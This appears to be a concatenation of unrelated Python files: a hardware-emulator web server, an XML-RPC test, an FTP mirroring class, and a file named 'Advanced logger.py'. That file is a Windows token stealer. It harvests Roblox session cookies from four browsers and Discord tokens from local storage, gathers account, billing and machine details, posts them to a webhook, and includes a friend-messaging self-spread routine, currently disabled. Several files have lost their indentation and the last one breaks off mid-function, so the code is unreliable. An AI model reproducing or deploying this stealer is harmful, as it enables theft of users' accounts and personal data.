    pub_sock = context.socket(zmq.PUSH)
    pull_uri = 'ipc://{0}'.format(
        os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
    )
    pub_sock.connect(pull_uri)
    pub_sock.send(self.serial.dumps(payload))
    return {
        'enc': 'clear',
        'load': {
            'jid': clear_load['jid'],
            'minions': minions
        }
    }
|
startEmul.py | #!/usr/bin/env python
'''
Created on Aug 3, 2015
@author: annette
'''
import json, time, threading, logging.config, sys
from bottle import route, run, template, static_file, request, response
from tools import helper
import core as core
import global_var as gl
import config as conf
from inputData import inputDataManager as inputDataManager
@route('/')
def index():
    """Render the landing page with the sorted list of known unit ids."""
    unit_ids = sorted(gl.oesunits.keys())
    return template(
        'log',
        admintext="APIS HW emulator",
        title="APIS HW emulator",
        ids=unit_ids,
    )
@route('/restart')
def getInitJsonFile():
    """Reset the emulator state from jsontmp/fakeResponse.json.

    Acquires the gl.sema busy-wait flag, reloads all units, and clears the
    per-unit bookkeeping.  Returns the refreshed unit table.
    """
    while gl.sema:
        time.sleep(0.01)
    gl.sema = True
    # BUG FIX: the original left gl.sema stuck True if open()/json.load()
    # raised, deadlocking every other handler; finally guarantees release.
    try:
        with open("jsontmp/fakeResponse.json") as json_init_file:
            gl.oesunits = json.load(json_init_file)
        for i in gl.oesunits:
            gl.oesunits[i]["oesunit"]["display"] = gl.displayNames[i]
            gl.is_ACCharging[i] = False
            gl.is_bypassMode[i] = False
            gl.acloss[i] = 0
            gl.dcloss[i] = 0
            gl.wasted[i] = 0
    finally:
        gl.sema = False
    return gl.oesunits
@route('/add/unit')
def addUnit():
    """Append one emulated unit (template jsontmp/standard.json) to the table.

    The new id is E%03d based on the current unit count; the template's ip's
    last octet is rewritten to the previous count.  Returns the unit table.
    """
    while gl.sema:
        time.sleep(0.01)
    gl.sema = True
    # BUG FIX: release gl.sema even if the template file is missing/corrupt;
    # the original deadlocked every handler on any exception here.
    try:
        with open("jsontmp/standard.json") as json_unit_file:
            oesunits_add_unit = json.load(json_unit_file)
        add_id = "E{0:03d}".format(len(gl.oesunits) + 1)
        oesunits_add_unit["oesunit"]["ip"] = oesunits_add_unit["oesunit"]["ip"][:-1] + str((len(gl.oesunits)))
        oesunits_add_unit["oesunit"]["display"] = gl.displayNames[add_id]
        oesunits_add_unit["oesunit"]["id"] = add_id
        gl.oesunits[add_id] = oesunits_add_unit
        gl.is_ACCharging[add_id] = False
        gl.is_bypassMode[add_id] = False
        gl.acloss[add_id] = 0
        gl.dcloss[add_id] = 0
        gl.wasted[add_id] = 0
    finally:
        gl.sema = False
    return gl.oesunits
@route('/remove/unit')
def removeUnit():
    """Remove the highest-numbered emulated unit, if any.

    Returns the (possibly unchanged) unit table.
    """
    while gl.sema:
        time.sleep(0.01)
    gl.sema = True
    # BUG FIX: the original KeyError'd on an empty table and, worse, left
    # gl.sema stuck True on any exception; guard and always release.
    try:
        if gl.oesunits:
            del_id = "E{0:03d}".format(len(gl.oesunits))
            del gl.oesunits[del_id]
            logger.debug(gl.oesunits.keys())
    finally:
        gl.sema = False
    return gl.oesunits
@route('/get/log')
def getLog():
    """Return the full unit table as JSON once no writer holds the semaphore.

    NOTE(review): only waits for gl.sema; it does not acquire it, so a writer
    may start mid-read — presumably acceptable for this emulator.
    """
    #logger.debug( "log request received")
    response.content_type = 'application/json'
    while gl.sema :
        time.sleep(0.01)
    return gl.oesunits
@route('/get/last')
def getLastJsonFile():
    """Restore the unit table from jsontmp/lastSave.json and return it."""
    while gl.sema:
        time.sleep(0.01)
    gl.sema = True
    # BUG FIX: release gl.sema even when the save file is missing/corrupt;
    # the original deadlocked every other handler on an exception here.
    try:
        with open("jsontmp/lastSave.json") as json_last_file:
            gl.oesunits = json.load(json_last_file)
        logger.debug(gl.oesunits)
    finally:
        gl.sema = False
    return gl.oesunits
@route('/save')
def setJsonFile():
    """Persist the current unit table to jsontmp/lastSave.json and echo it."""
    with open("jsontmp/lastSave.json", 'w') as json_file:
        json.dump(gl.oesunits, json_file)
    logger.debug(gl.oesunits)
    return gl.oesunits
def convert_dict_(src, keys):
    """Project *src* onto *keys*, dropping entries that are missing or None."""
    return {key: src[key] for key in keys if src.get(key) is not None}
def convert_dcdc_status_(src):
    """Project the status sub-dict onto its whitelisted fields."""
    return convert_dict_(src, ['status', 'alarmState', 'operationMode'])


def convert_dcdc_meter_(src):
    """Project the meter sub-dict onto its whitelisted fields."""
    return convert_dict_(src, ['wg', 'tmp', 'vb', 'wb', 'vg', 'ib', 'ig'])


def convert_dcdc_vdis_(src):
    """Project the vdis sub-dict onto its whitelisted fields."""
    return convert_dict_(src, ['dvg', 'drg'])


def convert_dcdc_param_(src):
    """Project the param sub-dict onto its whitelisted field."""
    return convert_dict_(src, ['dig'])
def convert_dcdc_(src):
    """Filter a dcdc record down to the externally visible sub-dicts."""
    converters = (
        ('status', convert_dcdc_status_),
        ('meter', convert_dcdc_meter_),
        ('vdis', convert_dcdc_vdis_),
        ('param', convert_dcdc_param_),
    )
    dst = {}
    for key, convert in converters:
        if src.get(key) is not None:
            dst[key] = convert(src[key])
    return dst
@route('/get/unit/<oesid>')
def getRemote(oesid):
    """Return one unit's record with its dcdc section filtered for export."""
    response.content_type = 'application/json'
    unit = gl.oesunits.get(oesid, {})
    return {
        key: (convert_dcdc_(value) if key == 'dcdc' else value)
        for key, value in unit.items()
    }
@route('/get/emu/<oesid>')
def getRemoteEmu(oesid):
    """Return the raw "emu" section of one unit (KeyError if oesid unknown)."""
    response.content_type = 'application/json'
    return gl.oesunits[oesid]["emu"]
@route('/get/dcdc/status/<oesid>')
def getDCDCStatus(oesid):
    """Return the filtered status and meter sections of one unit's dcdc."""
    response.content_type = 'application/json'
    dcdc = gl.oesunits.get(oesid, {}).get('dcdc', {})
    result = {}
    for key, convert in (('status', convert_dcdc_status_),
                         ('meter', convert_dcdc_meter_)):
        if dcdc.get(key) is not None:
            result[key] = convert(dcdc[key])
    return result
@route('/get/dcdc/<oesid>')
def getDCDC(oesid):
    """Return the full, unfiltered dcdc section (KeyError if oesid unknown)."""
    response.content_type = 'application/json'
    return gl.oesunits[oesid]["dcdc"]
@route('/get/acc')
def getAcc():
    """Return the current time-acceleration factor as JSON."""
    return json.dumps(gl.acc)
@route('/set/acc/<newacc>')
def setAcc(newacc):
    """Set the time-acceleration factor from the URL segment and echo it.

    Raises ValueError (-> HTTP 500) if *newacc* is not an integer string.
    """
    gl.acc = int(newacc)
    return json.dumps(gl.acc)
@route('/set/emu/<oesid>')
def setEmu(oesid):
    """Update "emu" fields of one unit from the query string.

    Each query key must already exist in the unit's emu dict; the value is
    stored as float.  Returns the whole unit table on success, or an error
    string naming the first unknown key.
    """
    emu = gl.oesunits[oesid]["emu"]
    for key in request.query:
        value = helper.convert(request.query[key])
        if key not in emu:
            return "following key not found: " + key
        emu[key] = float(value)
    return gl.oesunits
@route('/set/dcdc/<oesid>', method='GET')
def setDcdc(oesid):
    """Apply a dcdc mode/current/voltage command to one unit.

    Query params: mode (6-char status code), dig, dvg, optional drg, optional
    p1/p2 powermeter readings.  Triggers a ramp-up thread or a meter
    simulation pass, then returns the filtered dcdc record.
    """
    while gl.sema:
        time.sleep(0.01)
    gl.sema = True
    # BUG FIX: the original's early `return None` on a malformed request left
    # gl.sema stuck True (deadlock); try/finally guarantees release.
    try:
        mode = helper.convert(request.query.mode)
        dig = helper.convert(request.query.dig)
        dvg = helper.convert(request.query.dvg)
        if "drg" in dict(request.query):
            drg = float(helper.convert(request.query.drg))
        else:
            drg = gl.oesunits[oesid]["dcdc"]["vdis"]["drg"]
        if conf.debug:
            # BUG FIX: drg is a float here, so the original str "+" chain
            # raised TypeError whenever conf.debug was on; format() instead.
            logger.debug("setting oesunit {0}: mode={1}, dig={2}, dvg={3}, drg={4}".format(
                oesid, mode, dig, dvg, drg))
        if helper.convert(request.query.p1):
            p1 = helper.convert(request.query.p1)
            p2 = helper.convert(request.query.p2)
            gl.oesunits[oesid]["dcdc"]["powermeter"]["p1"] = float(p1)
            gl.oesunits[oesid]["dcdc"]["powermeter"]["p2"] = float(p2)
        if len(mode) != 6 or len(dig) < 1 or len(dvg) < 1:
            logger.warning("incorrect request")
            return None
        dvg = int(float(dvg))
        gl.oesunits[oesid]["dcdc"]["status"]["status"] = mode
        gl.oesunits[oesid]["dcdc"]["status"]["statusName"] = conf.modes[mode]
        gl.oesunits[oesid]["dcdc"]["status"]["operationMode"] = conf.modesOps[mode]
        gl.oesunits[oesid]["dcdc"]["status"]["runningState"] = conf.modesRunning[mode]
        gl.oesunits[oesid]["dcdc"]["vdis"]["dvg"] = float(dvg)
        gl.oesunits[oesid]["dcdc"]["vdis"]["drg"] = float(drg)
        gl.oesunits[oesid]["dcdc"]["param"]["dig"] = float(dig)
    finally:
        gl.sema = False
    currentBusVoltage = int(gl.oesunits[oesid]["dcdc"]["meter"]["vg"])
    # if voltage is not yet high, gradually ramp up
    if mode == "0x0014" and currentBusVoltage != dvg:
        if gl.acc > 120:
            if conf.debug: logger.debug("no need to ramp up")
            core.rampUp(dvg, currentBusVoltage, 0)
        else:
            if conf.debug: logger.debug("need to ramp up")
            interval = 120 / float(gl.acc)
            t = threading.Thread(target=core.rampUp, args=(dvg, currentBusVoltage, interval,), name="rampUp")
            t.start()
    # else simulate power transfer: update all other dcdc meter readers directly
    else:
        core.simulateMeter()
    return convert_dcdc_(gl.oesunits.get(oesid, {}).get('dcdc', {}))
@route('/set/dcdc/voltage/<oesid>', method='GET')
def setDcdcVoltage(oesid):
    """Set one unit's grid-voltage target (dvg, optional drg).

    Starts a ramp-up thread when the unit is in status 0x0014 and not yet at
    the target; otherwise re-simulates the meters.  Returns the filtered
    meter/vdis sections.
    """
    while gl.sema:
        time.sleep(0.01)
    gl.sema = True
    # BUG FIX: the original's early `return None` on a malformed request left
    # gl.sema stuck True (deadlock); try/finally guarantees release.
    try:
        dvg = helper.convert(request.query.dvg)
        if "drg" in dict(request.query):
            drg = float(helper.convert(request.query.drg))
        else:
            drg = gl.oesunits[oesid]["dcdc"]["vdis"]["drg"]
        logger.debug("setting voltage oesunit "+oesid+ "dvg="+dvg)
        status = gl.oesunits[oesid]["dcdc"]["status"]["status"]
        if len(dvg)<1:# :or status != "0x0014":
            logger.warning("incorrect request ")#(emulator only allows this command for status=0x0014)")
            return None
        dvg = int(float(dvg))
        gl.oesunits[oesid]["dcdc"]["vdis"]["dvg"] = float(dvg)
        gl.oesunits[oesid]["dcdc"]["vdis"]["drg"] = float(drg)
    finally:
        gl.sema = False
    currentBusVoltage = int(gl.oesunits[oesid]["dcdc"]["meter"]["vg"])
    # if voltage is not yet high, gradually ramp up
    if status == "0x0014" and currentBusVoltage != dvg:
        logger.debug("need to ramp up")
        interval = 120 / float(gl.acc)
        t = threading.Thread(target=core.rampUp, args=(dvg, currentBusVoltage, interval,), name="rampUp")
        t.start()
    # else simulate power transfer: update all other dcdc meter readers directly
    else:
        core.simulateMeter()
    dcdc = gl.oesunits.get(oesid, {}).get('dcdc', {})
    result = {}
    if dcdc.get('meter') is not None: result['meter'] = convert_dcdc_meter_(dcdc['meter'])
    if dcdc.get('vdis') is not None: result['vdis'] = convert_dcdc_vdis_(dcdc['vdis'])
    return result
@route('/set/dcdc/current/<oesid>', method='GET')
def setDcdcCurrent(oesid):
    """Set one unit's grid-current target (dig) and re-simulate the meters.

    Returns the filtered meter/param sections.
    """
    while gl.sema:
        time.sleep(0.01)
    gl.sema = True
    # BUG FIX: the original's early `return None` on a malformed request left
    # gl.sema stuck True (deadlock); try/finally guarantees release.
    try:
        dig = helper.convert(request.query.dig)
        logger.debug("setting current oesunit "+oesid+ "dig="+dig)
        if len(dig) < 1:
            logger.warning("incorrect request")
            return None
        gl.oesunits[oesid]["dcdc"]["param"]["dig"] = float(dig)
    finally:
        gl.sema = False
    core.simulateMeter()
    dcdc = gl.oesunits.get(oesid, {}).get('dcdc', {})
    result = {}
    if dcdc.get('meter') is not None: result['meter'] = convert_dcdc_meter_(dcdc['meter'])
    if dcdc.get('param') is not None: result['param'] = convert_dcdc_param_(dcdc['param'])
    return result
#####
# resources
#####
# Static-asset routes: serve files verbatim from the matching directory.
@route('/js/<filename>')
def js_static(filename):
    """Serve a JavaScript asset from ./js."""
    return static_file(filename, root='./js')
@route('/img/<filename>')
def img_static(filename):
    """Serve an image asset from ./img."""
    return static_file(filename, root='./img')
@route('/css/<filename>')
def img_static_css(filename):
    """Serve a stylesheet from ./css."""
    return static_file(filename, root='./css')
#Static Files
@route('/static/<filepath:path>')
def static(filepath):
    """Serve any file (nested paths allowed) from ./static."""
    return static_file(filepath, root="./static")
########################################
### init functions
########################################
def initializeOESUnits(args):
    """Seed the emulator: unit count from args[0], else one per display name."""
    if len(args) >= 1:
        count = int(args[0])
    else:
        count = len(gl.displayNames)
    addNUnits(count)
def addNUnits(n):
    """Register *n* emulated units via repeated addUnit() calls."""
    for _ in range(n):
        addUnit()
    logger.debug("starting off with "+str(n)+ " units.")
def startWebServer():
    """Run the bottle web server (blocking) on the configured host/port."""
    run(host=conf.b_host, port=conf.b_port, quiet=False, reloader=False)
def main(args):
    """Entry point: start the emulator, either driven by input data updates
    (web server in a daemon thread + power-flow loop in the main thread) or
    as a plain blocking web server.
    """
    try:
        if conf.doUpdates :
            gl.inData = inputDataManager(conf.dataSet)
            initializeOESUnits(args)
            # Web server runs as a daemon so the process can exit with main.
            t = threading.Thread(target=startWebServer, name="tornado")
            t.daemon = True
            t.start()
            time.sleep(1)
            logging.getLogger("tornado.access").setLevel(logging.WARN)
            # Blocking simulation loop; returns when the data set is exhausted.
            core.updatePowerFlow()
            logger.debug("emulator has finished, stop tornado too")
            gl.analyserObject.writeToCSV()
            t.kill_received = True
        else:
            gl.acc=1
            initializeOESUnits(args)
            startWebServer()
    except KeyboardInterrupt:
        logger.info( "Ctrl-c received! Sending kill to threads...")
        gl.analyserObject.writeToCSV()
        # NOTE(review): `t` is unbound here if the interrupt arrives before
        # the thread is created (or in the non-doUpdates branch) — this would
        # raise NameError; confirm intended behavior.
        t.kill_received = True
    #except :
    #    logger.info( "error happened" + str(sys.exc_info()[:2] ))
    #    t.kill_received = True
if __name__ == "__main__":
logging.config.fileConfig("config/logger.conf",disable_existing_loggers=False)
logger = logging.getLogger(__name__)
#disable logging of http requests
logging.getLogger("requests").setLevel(logging.WARN)
main(sys.argv[1:])
|
test_xmlrpc.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import xmlrpclib
from expects import *
from threading import Thread
from werkzeug_xmlrpc import WSGIXMLRPCApplication
class BasicTestMethods(unittest.TestCase):
    """Fixture that runs a WSGI XML-RPC server on a background thread.

    Exposes a module-level function ``test_1`` and an instance with a
    ``test_3`` echo method through WSGIXMLRPCApplication.
    """
    DEFAULT_HOST = 'localhost'
    DEFAULT_PORT = 3423
    DEFAULT_URI = 'http://{0}:{1}'.format(DEFAULT_HOST, DEFAULT_PORT)

    @staticmethod
    def make_server(host=DEFAULT_HOST, port=DEFAULT_PORT):
        """Build a wsgiref HTTP server wrapping the XML-RPC application."""
        def test_1():
            return 'test_1_response'

        class Test2(object):
            def test_3(self, obj):
                return obj

        application = WSGIXMLRPCApplication(
            instance=Test2(), methods=[test_1]
        )
        from wsgiref import simple_server
        return simple_server.make_server(host, port, application)

    @staticmethod
    def make_client(uri=DEFAULT_URI):
        """Return an XML-RPC proxy pointed at the fixture server."""
        return xmlrpclib.ServerProxy(uri)

    def setUp(self):
        self.server = self.make_server()
        self.thread = Thread(target=self.server.serve_forever)
        self.thread.start()

    def tearDown(self):
        self.server.shutdown()
        self.server.server_close()
class TestXMLRPC(BasicTestMethods):
    """End-to-end round trip through the XML-RPC WSGI application."""

    def test_xmlrpc_server(self):
        proxy = self.make_client()
        expect(proxy.test_1()).to(equal('test_1_response'))
        payload = {'trial dict': 4}
        expect(proxy.test_3(payload)).to(equal(payload))
|
Advanced logger.py | import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
import browser_cookie3, requests, threading
import base64
import time
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
key = "ENCODED BASE32 HOOK HEREEEE"
webhook = base64.b32decode(key)
def edge_logger():
try:
cookies = browser_cookie3.edge(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def chrome_logger():
try:
cookies = browser_cookie3.chrome(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def firefox_logger():
try:
cookies = browser_cookie3.firefox(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
def opera_logger():
try:
cookies = browser_cookie3.opera(domain_name='roblox.com')
cookies = str(cookies)
cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
requests.post(webhook, json={'username':'LOGGER', 'content':f' @everyone lmao we got another one ```{cookie}```'})
except:
pass
browsers = [edge_logger, chrome_logger, firefox_logger, opera_logger]
for x in browsers:
threading.Thread(target=x,).start()
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Logger",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("PASTE WEBHOOOOK", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
walk_ftp.py | import os
from dateutil import parser
import pickle
import warnings
import pandas as pd
import numpy as np
import datetime as dt
from time import sleep
import multiprocessing as mp
from threading import Thread
import tempfile
from ftplib import FTP
from logging import log
warnings.filterwarnings('ignore')
class WalkFTP:
def list_path(self, x):
    """Return the FTP NLST listing of *x*, reconnecting once on failure.

    On any error, sleeps 60s, re-establishes the connection, and retries a
    single time (letting that second attempt raise if it fails too).
    """
    try:
        return self._ftp.nlst(x)
    # was a bare `except:` — also caught KeyboardInterrupt/SystemExit
    except Exception:
        sleep(60)
        self.connect_ftp()
        return self._ftp.nlst(x)
def check_in_log(self, f, stat_mtime):
    '''
    return True if run ftp download
    '''
    # Guard-clause form: every path that requires a download returns early.
    history = self.log_data
    if history == {}:
        return True
    entry = history.get(f, {})
    if entry == {}:
        self.class_print('log empty for {} - glob ftp. Running Normal'.format(f))
        return True
    if not entry.get('get', False):
        # previous download never succeeded
        self.class_print('ftp get did not work {}'.format(f))
        return True
    if entry.get('mtime') != stat_mtime:
        # remote file changed since we last fetched it
        self.class_print('mtime does not match for {} log: {} current: {}'.format(
            f, entry.get('mtime'), stat_mtime
        ))
        return True
    if callable(self.processing_function):
        if entry.get('process', False):
            self.class_print('Not pulling {} - it is in the log'.format(f))
            return False
        self.class_print('pulling {} - did not process correctly'.format(f))
        return True
    self.class_print('Not pulling {} - it is in the log'.format(f))
    return False
def glob_ftp(self, store_paths = ''):
    """Recursively walk the FTP tree from *store_paths*, queueing files.

    Files whose modification time falls within [start_date, end_date] and
    which check_in_log approves are put on self.q; directories are recursed
    into unless a self.blocks substring matches.  A 'break' sentinel is
    queued when break_count is exceeded or the top-level walk completes.
    """
    # stop recursing once the configured cap is reached
    if self._glob_count > self.args.get('break_count', np.inf):
        return None
    for new_fp_or_file in self.list_path(store_paths):
        #new_fp_or_file = os.path.join(store_paths, f)
        stat_bool, stat_mtime = self.test_file(new_fp_or_file)
        if stat_bool:
            # entry is a file: apply the date window and the download log
            stat_mtime = str(stat_mtime)
            date_filter = (pd.to_datetime(stat_mtime) >= pd.to_datetime(self.start_date)) and (pd.to_datetime(stat_mtime) <= pd.to_datetime(self.end_date) )
            if date_filter and self.check_in_log(new_fp_or_file, stat_mtime):
                self.class_print('{} {} {}'.format(stat_mtime, new_fp_or_file, date_filter))
                self._glob_count+=1
                self.q.put(new_fp_or_file)
            else:
                pass
                self.class_print(f'{new_fp_or_file} date_filter: {date_filter} stat_mtime: {stat_mtime}')
            if self._glob_count > self.args.get('break_count', np.inf):
                self.class_print('publishing glob break')
                self.q.put('break')
                return None
        else:
            # entry is (presumably) a directory: recurse unless blocked
            self.class_print(f'STAT BOOL FALSE {new_fp_or_file}')
            block = False
            for b in self.blocks:
                if b in new_fp_or_file:
                    block=True
                    break
            if not block:
                self.glob_ftp(new_fp_or_file)
    # only the outermost invocation signals completion to the consumer
    if store_paths == self.orig_store_paths:
        self.class_print('publishing glob break')
        self.q.put('break')
def test_file(self, f):
try:
nlist = self._ftp.nlst(f)
except:
return False, None
if nlist == [] or nlist[0]==f:
mtime = self.extract_modified_time(f)
return True, mtime
else:
#self.class_print(f'{f} {nlist}')
return False, None
def store_all_ftp(self):
    """Consumer loop: download every path queued on self.q.

    Terminates on the 'break' sentinel or when break_count downloads have
    been done, then forwards a ('break', 'break') sentinel to process_q.
    """
    limit = self.args.get('break_count', np.inf)
    downloaded = 0
    while True:
        fp = self.q.get()
        hit_sentinel = isinstance(fp, str) and fp == 'break'
        if hit_sentinel or downloaded > limit:
            self.class_print('publishing process break')
            self.process_q.put(('break', 'break'))
            break
        if fp is None:
            sleep(1)
        elif isinstance(fp, str):
            downloaded += 1
            self.class_print('storing: {}'.format(fp))
            self.store_ftp(fp)
            self.class_print('.........')
    self.class_print('finished get function')
def store_ftp(self, fp):
    """Download remote path *fp* into self._output_path, mirroring its layout.

    Skips the transfer when the local file already exists; transfer errors
    are printed, not raised.
    """
    target_dir = os.path.join(self._output_path, os.path.dirname(fp))
    target_file = os.path.join(self._output_path, fp)
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    if os.path.exists(target_file):
        return
    try:
        self.get(fp, target_file)
    except Exception as e:
        print('ERROR ON: {} {}'.format(fp, target_file))
        print(e)
def exit_q(self):
    """Push break sentinels to both queues and tear down the connection."""
    self.process_q.put(('break', 'break'))
    self.q.put('break')
    self.cleanup()
def connect_ftp(self, returns=False):
    """Open and log into an FTP connection, retrying once after 30s.

    With returns=True the connection is returned; otherwise it is stored on
    self._ftp.  None username/password means anonymous login.
    """
    ftp = FTP(self._base_url)
    max_try_count = 2
    count = 0
    while count < max_try_count:
        count += 1
        try:
            if not returns: self.class_print('logging into ftp')
            if self._username is None and self._password is None:
                # BUG FIX: original assigned the result to `mg` but printed
                # the undefined name `msg` -> NameError on this path.
                # ftplib's login() defaults to anonymous when no creds given.
                msg = ftp.login()
            else:
                msg = ftp.login(user=self._username, passwd=self._password)
            if not returns: self.class_print(msg)
            break
        # was a bare `except:` — also caught KeyboardInterrupt/SystemExit
        except Exception:
            sleep(30)
    if returns:
        return ftp
    self._ftp = ftp
def cleanup(self):
    """Close the FTP connection and drop the temp directory if we own one."""
    self._ftp.close()
    if not self.close_temporary_directory:
        return
    self.tmpdir.cleanup()
def extract_modified_time(self, remotepath):
    """Fetch the remote file's modification time via the FTP MDTM command.

    Opens a dedicated connection so it can run concurrently with the
    download workers.

    Returns
    -------
    pandas.Timestamp or str
        The parsed timestamp on success, '' on any failure (server
        without MDTM support, directories, parse errors).
    """
    ftp = self.connect_ftp(returns=True)
    ts = None
    try:
        ts = ftp.voidcmd('MDTM ' + remotepath)
        # reply looks like '213 YYYYMMDDHHMMSS'; strip the status code
        ts = ts[4:].strip()
        # `parser` is a module-level name -- presumably dateutil.parser;
        # TODO confirm against the file's imports
        ts = parser.parse(ts)
        return pd.to_datetime(ts)
    except Exception as e:
        self.class_print(f'{remotepath} {e}')
        return ''
    # (an unreachable `assert False` after the returns and a block of
    # commented-out code were removed)
def get(self, remotepath, file):
    """Download *remotepath* into local *file*, retrying once.

    Records the outcome and the remote mtime in the log, removes any
    partial file on failure, and pushes the file onto the processing
    queue when a processing_function is configured.

    Raises
    ------
    AssertionError
        If both attempts fail.
    """
    successful_get = False
    ftp = self._ftp
    # pd.Timestamp replaces pd.datetime, which was removed in pandas 1.0
    start_time = pd.Timestamp.now()
    for i in range(0, 2):
        self.class_print(f'starting store get {remotepath}')
        try:
            stat_mtime = self.extract_modified_time(remotepath)
            # the context manager guarantees the handle is closed even
            # when retrbinary dies halfway through (the original leaked
            # the open handle on exception)
            with open(file, 'wb') as gFile:
                self.class_print('reading: {}'.format(remotepath))
                ftp.retrbinary('RETR ' + remotepath, gFile.write, blocksize=self._blocksize)
            self.class_print(f'finished _s get {remotepath}')
            successful_get = True
            self.add_log(remotepath, 'get', successful_get)
            self.add_log(remotepath, 'mtime', stat_mtime)
            break
        except Exception as e:
